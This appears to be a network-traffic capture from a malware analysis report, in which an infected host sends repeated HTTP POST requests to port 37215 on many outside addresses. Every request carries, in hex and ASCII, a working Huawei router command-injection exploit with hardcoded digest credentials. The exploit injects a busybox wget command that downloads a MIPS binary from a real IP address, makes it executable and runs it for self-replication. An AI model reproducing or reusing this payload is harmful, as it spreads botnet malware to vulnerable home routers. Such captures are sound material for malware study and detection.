                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    88192.168.2.1440824157.5.208.6137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.155522108 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.567409992 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    89192.168.2.1447300173.121.75.21037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.156955957 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.553870916 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    90192.168.2.1443948157.209.178.1837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.156955957 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.553870916 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    91192.168.2.1436746157.15.8.19737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.157015085 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.509433031 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    92192.168.2.1452278197.23.163.1437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.162688017 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.496478081 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
